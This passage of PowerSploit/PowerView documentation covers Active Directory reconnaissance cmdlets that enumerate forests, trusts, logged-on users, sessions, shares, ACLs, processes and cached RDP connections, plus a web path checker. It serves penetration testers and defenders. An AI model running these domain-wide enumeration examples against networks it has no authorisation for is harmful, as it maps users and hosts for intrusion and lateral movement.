61 | Required: False
62 | Position: Named
63 | Default value: [Management.Automation.PSCredential]::Empty
64 | Accept pipeline input: False
65 | Accept wildcard characters: False
66 | ```
67 |
68 | ## INPUTS
69 |
70 | ## OUTPUTS
71 |
72 | ### System.Management.Automation.PSCustomObject
73 |
74 | Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition
75 | to the forest root domain SID.
76 |
77 | ## NOTES
78 |
79 | ## RELATED LINKS
80 |
81 |
--------------------------------------------------------------------------------
/docs/Recon/Get-ForestDomain.md:
--------------------------------------------------------------------------------
1 | # Get-ForestDomain
2 |
3 | ## SYNOPSIS
4 | Return all domains for the current (or specified) forest.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-Forest
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ForestDomain [[-Forest] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns all domains for the current forest or the forest specified
18 | by -Forest X.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-ForestDomain
25 | ```
26 |
27 | ### -------------------------- EXAMPLE 2 --------------------------
28 | ```
29 | Get-ForestDomain -Forest external.local
30 | ```
31 |
32 | ### -------------------------- EXAMPLE 3 --------------------------
33 | ```
34 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
35 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
36 | Get-ForestDomain -Credential $Cred
37 | ```
38 |
39 |
40 | ## PARAMETERS
41 |
42 | ### -Forest
43 | Specifies the forest name to query for domains.
44 |
45 | ```yaml
46 | Type: String
47 | Parameter Sets: (All)
48 | Aliases:
49 |
50 | Required: False
51 | Position: 1
52 | Default value: None
53 | Accept pipeline input: True (ByValue)
54 | Accept wildcard characters: False
55 | ```
56 |
57 | ### -Credential
58 | A \[Management.Automation.PSCredential\] object of alternate credentials
59 | for connection to the target forest.
60 |
61 | ```yaml
62 | Type: PSCredential
63 | Parameter Sets: (All)
64 | Aliases:
65 |
66 | Required: False
67 | Position: Named
68 | Default value: [Management.Automation.PSCredential]::Empty
69 | Accept pipeline input: False
70 | Accept wildcard characters: False
71 | ```
72 |
73 | ## INPUTS
74 |
75 | ## OUTPUTS
76 |
77 | ### System.DirectoryServices.ActiveDirectory.Domain
78 |
79 | ## NOTES
80 |
81 | ## RELATED LINKS
82 |
83 |
--------------------------------------------------------------------------------
/docs/Recon/Get-ForestGlobalCatalog.md:
--------------------------------------------------------------------------------
1 | # Get-ForestGlobalCatalog
2 |
3 | ## SYNOPSIS
4 | Return all global catalogs for the current (or specified) forest.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-Forest
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ForestGlobalCatalog [[-Forest] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns all global catalogs for the current forest or the forest specified
18 | by -Forest X, using Get-Forest to retrieve the specified forest object
19 | and its .FindAllGlobalCatalogs() method to enumerate the global catalogs.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-ForestGlobalCatalog
26 | ```
27 |
28 | ### -------------------------- EXAMPLE 2 --------------------------
29 | ```
30 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
31 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
32 | Get-ForestGlobalCatalog -Credential $Cred
33 | ```
34 |
35 |
36 | ## PARAMETERS
37 |
38 | ### -Forest
39 | Specifies the forest name to query for global catalogs.
40 |
41 | ```yaml
42 | Type: String
43 | Parameter Sets: (All)
44 | Aliases:
45 |
46 | Required: False
47 | Position: 1
48 | Default value: None
49 | Accept pipeline input: True (ByValue)
50 | Accept wildcard characters: False
51 | ```
52 |
53 | ### -Credential
54 | A \[Management.Automation.PSCredential\] object of alternate credentials
55 | for connection to the target domain.
56 |
57 | ```yaml
58 | Type: PSCredential
59 | Parameter Sets: (All)
60 | Aliases:
61 |
62 | Required: False
63 | Position: Named
64 | Default value: [Management.Automation.PSCredential]::Empty
65 | Accept pipeline input: False
66 | Accept wildcard characters: False
67 | ```
68 |
69 | ## INPUTS
70 |
71 | ## OUTPUTS
72 |
73 | ### System.DirectoryServices.ActiveDirectory.GlobalCatalog
74 |
75 | ## NOTES
76 |
77 | ## RELATED LINKS
78 |
79 |
--------------------------------------------------------------------------------
/docs/Recon/Get-ForestTrust.md:
--------------------------------------------------------------------------------
1 | # Get-ForestTrust
2 |
3 | ## SYNOPSIS
4 | Return all forest trusts for the current forest or a specified forest.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-Forest
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ForestTrust [[-Forest] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | This function will enumerate trust relationships for the current (or a remote)
18 | forest using the .NET method GetAllTrustRelationships() on a
19 | System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-ForestTrust
26 | ```
27 |
28 | Return current forest trusts.
29 |
30 | ### -------------------------- EXAMPLE 2 --------------------------
31 | ```
32 | Get-ForestTrust -Forest "external.local"
33 | ```
34 |
35 | Return trusts for the "external.local" forest.
36 |
37 | ### -------------------------- EXAMPLE 3 --------------------------
38 | ```
39 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
40 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
41 | Get-ForestTrust -Forest "external.local" -Credential $Cred
42 | ```
43 |
44 |
45 | Return trusts for the "external.local" forest using the specified alternate credentials.
46 |
47 | ## PARAMETERS
48 |
49 | ### -Forest
50 | Specifies the forest to query for trusts, defaults to the current forest.
51 |
52 | ```yaml
53 | Type: String
54 | Parameter Sets: (All)
55 | Aliases: Name
56 |
57 | Required: False
58 | Position: 1
59 | Default value: None
60 | Accept pipeline input: True (ByPropertyName, ByValue)
61 | Accept wildcard characters: False
62 | ```
63 |
64 | ### -Credential
65 | A \[Management.Automation.PSCredential\] object of alternate credentials
66 | for connection to the target domain.
67 |
68 | ```yaml
69 | Type: PSCredential
70 | Parameter Sets: (All)
71 | Aliases:
72 |
73 | Required: False
74 | Position: Named
75 | Default value: [Management.Automation.PSCredential]::Empty
76 | Accept pipeline input: False
77 | Accept wildcard characters: False
78 | ```
79 |
80 | ## INPUTS
81 |
82 | ## OUTPUTS
83 |
84 | ### PowerView.DomainTrust.NET
85 |
86 | A TrustRelationshipInformationCollection returned when using .NET methods (default).
87 |
88 | ## NOTES
89 |
90 | ## RELATED LINKS
91 |
92 |
--------------------------------------------------------------------------------
/docs/Recon/Get-HttpStatus.md:
--------------------------------------------------------------------------------
1 | # Get-HttpStatus
2 |
3 | ## SYNOPSIS
4 | Returns the HTTP Status Codes and full URL for specified paths.
5 |
6 | PowerSploit Function: Get-HttpStatus
7 | Author: Chris Campbell (@obscuresec)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Get-HttpStatus [-Target] [[-Path] ] [[-Port] ] [-UseSSL]
16 | ```
17 |
18 | ## DESCRIPTION
19 | A script to check for the existence of a path or file on a webserver.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*}
26 | ```
27 |
28 | ### -------------------------- EXAMPLE 2 --------------------------
29 | ```
30 | Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
31 | ```
32 |
33 | ## PARAMETERS
34 |
35 | ### -Target
36 | Specifies the remote web host either by IP or hostname.
37 |
38 | ```yaml
39 | Type: String
40 | Parameter Sets: (All)
41 | Aliases:
42 |
43 | Required: True
44 | Position: 1
45 | Default value: None
46 | Accept pipeline input: False
47 | Accept wildcard characters: False
48 | ```
49 |
50 | ### -Path
51 | Specifies the path to a dictionary file of paths to check on the remote host (defaults to .\Dictionaries\admin.txt).
52 |
53 | ```yaml
54 | Type: String
55 | Parameter Sets: (All)
56 | Aliases:
57 |
58 | Required: False
59 | Position: 2
60 | Default value: .\Dictionaries\admin.txt
61 | Accept pipeline input: False
62 | Accept wildcard characters: False
63 | ```
64 |
65 | ### -Port
66 | Specifies the port to connect to.
67 |
68 | ```yaml
69 | Type: Int32
70 | Parameter Sets: (All)
71 | Aliases:
72 |
73 | Required: False
74 | Position: 3
75 | Default value: 0
76 | Accept pipeline input: False
77 | Accept wildcard characters: False
78 | ```
79 |
80 | ### -UseSSL
81 | Use an SSL connection.
82 |
83 | ```yaml
84 | Type: SwitchParameter
85 | Parameter Sets: (All)
86 | Aliases:
87 |
88 | Required: False
89 | Position: Named
90 | Default value: False
91 | Accept pipeline input: False
92 | Accept wildcard characters: False
93 | ```
94 |
95 | ## INPUTS
96 |
97 | ## OUTPUTS
98 |
99 | ## NOTES
100 | HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error
101 |
102 | ## RELATED LINKS
103 |
104 | [http://obscuresecurity.blogspot.com](http://obscuresecurity.blogspot.com)
105 | [http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html](http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html)
106 |
107 |
--------------------------------------------------------------------------------
/docs/Recon/Get-NetComputerSiteName.md:
--------------------------------------------------------------------------------
1 | # Get-NetComputerSiteName
2 |
3 | ## SYNOPSIS
4 | Returns the AD site where the local (or a remote) machine resides.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-NetComputerSiteName [[-ComputerName] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | This function will use the DsGetSiteName Win32API call to look up the
18 | name of the site where a specified computer resides.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local
25 | ```
26 |
27 | Returns the site for WINDOWS1.testlab.local.
28 |
29 | ### -------------------------- EXAMPLE 2 --------------------------
30 | ```
31 | Get-DomainComputer | Get-NetComputerSiteName
32 | ```
33 |
34 | Returns the sites for every machine in AD.
35 |
36 | ### -------------------------- EXAMPLE 3 --------------------------
37 | ```
38 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
39 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
40 | Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred
41 | ```
42 |
43 |
44 | ## PARAMETERS
45 |
46 | ### -ComputerName
47 | Specifies the hostname to check the site for (also accepts IP addresses).
48 | Defaults to 'localhost'.
49 |
50 | ```yaml
51 | Type: String[]
52 | Parameter Sets: (All)
53 | Aliases: HostName, dnshostname, name
54 |
55 | Required: False
56 | Position: 1
57 | Default value: Localhost
58 | Accept pipeline input: True (ByPropertyName, ByValue)
59 | Accept wildcard characters: False
60 | ```
61 |
62 | ### -Credential
63 | A \[Management.Automation.PSCredential\] object of alternate credentials
64 | for connection to the remote system using Invoke-UserImpersonation.
65 |
66 | ```yaml
67 | Type: PSCredential
68 | Parameter Sets: (All)
69 | Aliases:
70 |
71 | Required: False
72 | Position: Named
73 | Default value: [Management.Automation.PSCredential]::Empty
74 | Accept pipeline input: False
75 | Accept wildcard characters: False
76 | ```
77 |
78 | ## INPUTS
79 |
80 | ## OUTPUTS
81 |
82 | ### PowerView.ComputerSite
83 |
84 | A PSCustomObject containing the ComputerName, IPAddress, and associated Site name.
85 |
86 | ## NOTES
87 |
88 | ## RELATED LINKS
89 |
90 |
--------------------------------------------------------------------------------
/docs/Recon/Get-NetLoggedon.md:
--------------------------------------------------------------------------------
1 | # Get-NetLoggedon
2 |
3 | ## SYNOPSIS
4 | Returns users logged on the local (or a remote) machine.
5 | Note: administrative rights needed for newer Windows OSes.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-NetLoggedon [[-ComputerName] ] [-Credential ]
15 | ```
16 |
17 | ## DESCRIPTION
18 | This function will execute the NetWkstaUserEnum Win32API call to query
19 | a given host for actively logged on users.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-NetLoggedon
26 | ```
27 |
28 | Returns users actively logged onto the local host.
29 |
30 | ### -------------------------- EXAMPLE 2 --------------------------
31 | ```
32 | Get-NetLoggedon -ComputerName sqlserver
33 | ```
34 |
35 | Returns users actively logged onto the 'sqlserver' host.
36 |
37 | ### -------------------------- EXAMPLE 3 --------------------------
38 | ```
39 | Get-DomainComputer | Get-NetLoggedon
40 | ```
41 |
42 | Returns all logged on users for all computers in the domain.
43 |
44 | ### -------------------------- EXAMPLE 4 --------------------------
45 | ```
46 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
47 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
48 | Get-NetLoggedon -ComputerName sqlserver -Credential $Cred
49 | ```
50 |
51 |
52 | ## PARAMETERS
53 |
54 | ### -ComputerName
55 | Specifies the hostname to query for logged on users (also accepts IP addresses).
56 | Defaults to 'localhost'.
57 |
58 | ```yaml
59 | Type: String[]
60 | Parameter Sets: (All)
61 | Aliases: HostName, dnshostname, name
62 |
63 | Required: False
64 | Position: 1
65 | Default value: Localhost
66 | Accept pipeline input: True (ByPropertyName, ByValue)
67 | Accept wildcard characters: False
68 | ```
69 |
70 | ### -Credential
71 | A \[Management.Automation.PSCredential\] object of alternate credentials
72 | for connection to the remote system using Invoke-UserImpersonation.
73 |
74 | ```yaml
75 | Type: PSCredential
76 | Parameter Sets: (All)
77 | Aliases:
78 |
79 | Required: False
80 | Position: Named
81 | Default value: [Management.Automation.PSCredential]::Empty
82 | Accept pipeline input: False
83 | Accept wildcard characters: False
84 | ```
85 |
86 | ## INPUTS
87 |
88 | ## OUTPUTS
89 |
90 | ### PowerView.LoggedOnUserInfo
91 |
92 | A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
93 | the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added.
94 |
95 | ## NOTES
96 |
97 | ## RELATED LINKS
98 |
99 | [http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
100 |
101 |
--------------------------------------------------------------------------------
/docs/Recon/Get-NetSession.md:
--------------------------------------------------------------------------------
1 | # Get-NetSession
2 |
3 | ## SYNOPSIS
4 | Returns session information for the local (or a remote) machine.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-NetSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]
14 | ```
15 |
16 | ## DESCRIPTION
17 | This function will execute the NetSessionEnum Win32API call to query
18 | a given host for active sessions.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-NetSession
25 | ```
26 |
27 | Returns active sessions on the local host.
28 |
29 | ### -------------------------- EXAMPLE 2 --------------------------
30 | ```
31 | Get-NetSession -ComputerName sqlserver
32 | ```
33 |
34 | Returns active sessions on the 'sqlserver' host.
35 |
36 | ### -------------------------- EXAMPLE 3 --------------------------
37 | ```
38 | Get-DomainController | Get-NetSession
39 | ```
40 |
41 | Returns active sessions on all domain controllers.
42 |
43 | ### -------------------------- EXAMPLE 4 --------------------------
44 | ```
45 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
46 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
47 | Get-NetSession -ComputerName sqlserver -Credential $Cred
48 | ```
49 |
50 |
51 | ## PARAMETERS
52 |
53 | ### -ComputerName
54 | Specifies the hostname to query for sessions (also accepts IP addresses).
55 | Defaults to 'localhost'.
56 |
57 | ```yaml
58 | Type: String[]
59 | Parameter Sets: (All)
60 | Aliases: HostName, dnshostname, name
61 |
62 | Required: False
63 | Position: 1
64 | Default value: Localhost
65 | Accept pipeline input: True (ByPropertyName, ByValue)
66 | Accept wildcard characters: False
67 | ```
68 |
69 | ### -Credential
70 | A \[Management.Automation.PSCredential\] object of alternate credentials
71 | for connection to the remote system using Invoke-UserImpersonation.
72 |
73 | ```yaml
74 | Type: PSCredential
75 | Parameter Sets: (All)
76 | Aliases:
77 |
78 | Required: False
79 | Position: Named
80 | Default value: [Management.Automation.PSCredential]::Empty
81 | Accept pipeline input: False
82 | Accept wildcard characters: False
83 | ```
84 |
85 | ## INPUTS
86 |
87 | ## OUTPUTS
88 |
89 | ### PowerView.SessionInfo
90 |
91 | A PSCustomObject representing a SESSION_INFO_10 structure, including
92 | the CName/UserName/Time/IdleTime for each session, with the ComputerName added.
93 |
94 | ## NOTES
95 |
96 | ## RELATED LINKS
97 |
98 | [http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
99 |
100 |
--------------------------------------------------------------------------------
/docs/Recon/Get-NetShare.md:
--------------------------------------------------------------------------------
1 | # Get-NetShare
2 |
3 | ## SYNOPSIS
4 | Returns open shares on the local (or a remote) machine.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-NetShare [[-ComputerName] <String[]>] [-Credential <PSCredential>]
14 | ```
15 |
16 | ## DESCRIPTION
17 | This function will execute the NetShareEnum Win32API call to query
18 | a given host for open shares.
19 | This is a replacement for "net share \\\\hostname".
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-NetShare
26 | ```
27 |
28 | Returns active shares on the local host.
29 |
30 | ### -------------------------- EXAMPLE 2 --------------------------
31 | ```
32 | Get-NetShare -ComputerName sqlserver
33 | ```
34 |
35 | Returns active shares on the 'sqlserver' host.
36 |
37 | ### -------------------------- EXAMPLE 3 --------------------------
38 | ```
39 | Get-DomainComputer | Get-NetShare
40 | ```
41 |
42 | Returns all shares for all computers in the domain.
43 |
44 | ### -------------------------- EXAMPLE 4 --------------------------
45 | ```
46 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
47 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
48 | Get-NetShare -ComputerName sqlserver -Credential $Cred
49 | ```
50 |
51 |
52 | ## PARAMETERS
53 |
54 | ### -ComputerName
55 | Specifies the hostname to query for shares (also accepts IP addresses).
56 | Defaults to 'localhost'.
57 |
58 | ```yaml
59 | Type: String[]
60 | Parameter Sets: (All)
61 | Aliases: HostName, dnshostname, name
62 |
63 | Required: False
64 | Position: 1
65 | Default value: Localhost
66 | Accept pipeline input: True (ByPropertyName, ByValue)
67 | Accept wildcard characters: False
68 | ```
69 |
70 | ### -Credential
71 | A \[Management.Automation.PSCredential\] object of alternate credentials
72 | for connection to the remote system using Invoke-UserImpersonation.
73 |
74 | ```yaml
75 | Type: PSCredential
76 | Parameter Sets: (All)
77 | Aliases:
78 |
79 | Required: False
80 | Position: Named
81 | Default value: [Management.Automation.PSCredential]::Empty
82 | Accept pipeline input: False
83 | Accept wildcard characters: False
84 | ```
85 |
86 | ## INPUTS
87 |
88 | ## OUTPUTS
89 |
90 | ### PowerView.ShareInfo
91 |
92 | A PSCustomObject representing a SHARE_INFO_1 structure, including
93 | the name/type/remark for each share, with the ComputerName added.
94 |
95 | ## NOTES
96 |
97 | ## RELATED LINKS
98 |
99 | [http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
100 |
101 |
--------------------------------------------------------------------------------
/docs/Recon/Get-PathAcl.md:
--------------------------------------------------------------------------------
1 | # Get-PathAcl
2 |
3 | ## SYNOPSIS
4 | Enumerates the ACL for a given file path.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-PathAcl [-Path] <String[]> [[-Credential] <PSCredential>]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates the ACL for a specified file/folder path, and translates
18 | the access rules for each entry into readable formats.
19 | If -Credential is passed,
20 | Add-RemoteConnection/Remove-RemoteConnection are used to temporarily map the remote share.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Get-PathAcl "\\SERVER\Share\"
27 | ```
28 |
29 | Returns ACLs for the given UNC share.
30 |
31 | ### -------------------------- EXAMPLE 2 --------------------------
32 | ```
33 | gci .\test.txt | Get-PathAcl
34 | ```
35 |
36 | ### -------------------------- EXAMPLE 3 --------------------------
37 | ```
38 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
39 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
40 | Get-PathAcl -Path "\\SERVER\Share\" -Credential $Cred
41 | ```
42 |
43 |
44 | ## PARAMETERS
45 |
46 | ### -Path
47 | Specifies the local or remote path to enumerate the ACLs for.
48 |
49 | ```yaml
50 | Type: String[]
51 | Parameter Sets: (All)
52 | Aliases: FullName
53 |
54 | Required: True
55 | Position: 1
56 | Default value: None
57 | Accept pipeline input: True (ByPropertyName, ByValue)
58 | Accept wildcard characters: False
59 | ```
60 |
61 | ### -Credential
62 | A \[Management.Automation.PSCredential\] object of alternate credentials
63 | for connection to the target path.
64 |
65 | ```yaml
66 | Type: PSCredential
67 | Parameter Sets: (All)
68 | Aliases:
69 |
70 | Required: False
71 | Position: 2
72 | Default value: [Management.Automation.PSCredential]::Empty
73 | Accept pipeline input: False
74 | Accept wildcard characters: False
75 | ```
76 |
77 | ## INPUTS
78 |
79 | ### String
80 |
81 | One or more paths to enumerate ACLs for.
82 |
83 | ## OUTPUTS
84 |
85 | ### PowerView.FileACL
86 |
87 | A custom object with the full path and associated ACL entries.
88 |
89 | ## NOTES
90 |
91 | ## RELATED LINKS
92 |
93 | [https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144)
94 |
95 |
--------------------------------------------------------------------------------
/docs/Recon/Get-RegLoggedOn.md:
--------------------------------------------------------------------------------
1 | # Get-RegLoggedOn
2 |
3 | ## SYNOPSIS
4 | Returns who is logged onto the local (or a remote) machine
5 | through enumeration of remote registry keys.
6 |
7 | Note: This function requires only domain user rights on the
8 | machine you're enumerating, but remote registry must be enabled.
9 |
10 | Author: Matt Kelly (@BreakersAll)
11 | License: BSD 3-Clause
12 | Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID
13 |
14 | ## SYNTAX
15 |
16 | ```
17 | Get-RegLoggedOn [[-ComputerName] <String[]>]
18 | ```
19 |
20 | ## DESCRIPTION
21 | This function queries the HKU registry hive to retrieve the SIDs of locally
22 | logged on users and then attempts to resolve each SID back to a user name.
23 | The technique is adapted from Sysinternals' PsLoggedOn.
24 | Its benefit over
25 | using the NetWkstaUserEnum API (Get-NetLoggedon) is that fewer user privileges
26 | are required (NetWkstaUserEnum requires remote admin access).
27 |
28 | ## EXAMPLES
29 |
30 | ### -------------------------- EXAMPLE 1 --------------------------
31 | ```
32 | Get-RegLoggedOn
33 | ```
34 |
35 | Returns users actively logged onto the local host.
36 |
37 | ### -------------------------- EXAMPLE 2 --------------------------
38 | ```
39 | Get-RegLoggedOn -ComputerName sqlserver
40 | ```
41 |
42 | Returns users actively logged onto the 'sqlserver' host.
43 |
44 | ### -------------------------- EXAMPLE 3 --------------------------
45 | ```
46 | Get-DomainController | Get-RegLoggedOn
47 | ```
48 |
49 | Returns users actively logged onto all domain controllers.
50 |
51 | ### -------------------------- EXAMPLE 4 --------------------------
52 | ```
53 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
54 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
55 | Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred
56 | ```
57 |
58 |
59 | ## PARAMETERS
60 |
61 | ### -ComputerName
62 | Specifies the hostname to query for remote registry values (also accepts IP addresses).
63 | Defaults to 'localhost'.
64 |
65 | ```yaml
66 | Type: String[]
67 | Parameter Sets: (All)
68 | Aliases: HostName, dnshostname, name
69 |
70 | Required: False
71 | Position: 1
72 | Default value: Localhost
73 | Accept pipeline input: True (ByPropertyName, ByValue)
74 | Accept wildcard characters: False
75 | ```
76 |
77 | ## INPUTS
78 |
79 | ## OUTPUTS
80 |
81 | ### PowerView.RegLoggedOnUser
82 |
83 | A PSCustomObject including the UserDomain/UserName/UserSID of each
84 | actively logged on user, with the ComputerName added.
85 |
86 | ## NOTES
87 |
88 | ## RELATED LINKS
89 |
90 |
--------------------------------------------------------------------------------
/docs/Recon/Get-WMIProcess.md:
--------------------------------------------------------------------------------
1 | # Get-WMIProcess
2 |
3 | ## SYNOPSIS
4 | Returns a list of processes and their owners on the local or remote machine.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-WMIProcess [[-ComputerName] <String[]>] [-Credential <PSCredential>]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,
18 | including the owners of the particular process.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-WMIProcess -ComputerName WINDOWS1
25 | ```
26 |
27 | ### -------------------------- EXAMPLE 2 --------------------------
28 | ```
29 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
30 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
31 | Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred
32 | ```
33 |
34 |
35 | ## PARAMETERS
36 |
37 | ### -ComputerName
38 | Specifies the hostname to query for running processes (also accepts IP addresses).
39 | Defaults to 'localhost'.
40 |
41 | ```yaml
42 | Type: String[]
43 | Parameter Sets: (All)
44 | Aliases: HostName, dnshostname, name
45 |
46 | Required: False
47 | Position: 1
48 | Default value: Localhost
49 | Accept pipeline input: True (ByPropertyName, ByValue)
50 | Accept wildcard characters: False
51 | ```
52 |
53 | ### -Credential
54 | A \[Management.Automation.PSCredential\] object of alternate credentials
55 | for connection to the remote system.
56 |
57 | ```yaml
58 | Type: PSCredential
59 | Parameter Sets: (All)
60 | Aliases:
61 |
62 | Required: False
63 | Position: Named
64 | Default value: [Management.Automation.PSCredential]::Empty
65 | Accept pipeline input: False
66 | Accept wildcard characters: False
67 | ```
68 |
69 | ## INPUTS
70 |
71 | ## OUTPUTS
72 |
73 | ### PowerView.UserProcess
74 |
75 | A PSCustomObject containing the remote process information.
76 |
77 | ## NOTES
78 |
79 | ## RELATED LINKS
80 |
81 |
--------------------------------------------------------------------------------
/docs/Recon/Get-WMIRegCachedRDPConnection.md:
--------------------------------------------------------------------------------
1 | # Get-WMIRegCachedRDPConnection
2 |
3 | ## SYNOPSIS
4 | Returns information about RDP connections outgoing from the local (or remote) machine.
5 |
6 | Note: This function requires administrative rights on the machine you're enumerating.
7 |
8 | Author: Will Schroeder (@harmj0y)
9 | License: BSD 3-Clause
10 | Required Dependencies: ConvertFrom-SID
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Get-WMIRegCachedRDPConnection [[-ComputerName] <String[]>] [-Credential <PSCredential>]
16 | ```
17 |
18 | ## DESCRIPTION
19 | Uses remote registry functionality to query all entries for the
20 | "Windows Remote Desktop Connection Client" on a machine, separated by
21 | user and target server.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-WMIRegCachedRDPConnection
28 | ```
29 |
30 | Returns the RDP connection client information for the local machine.
31 |
32 | ### -------------------------- EXAMPLE 2 --------------------------
33 | ```
34 | Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local
35 | ```
36 |
37 | Returns the RDP connection client information for the WINDOWS2.testlab.local machine.
38 |
39 | ### -------------------------- EXAMPLE 3 --------------------------
40 | ```
41 | Get-DomainComputer | Get-WMIRegCachedRDPConnection
42 | ```
43 |
44 | Returns cached RDP information for all machines in the domain.
45 |
46 | ### -------------------------- EXAMPLE 4 --------------------------
47 | ```
48 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
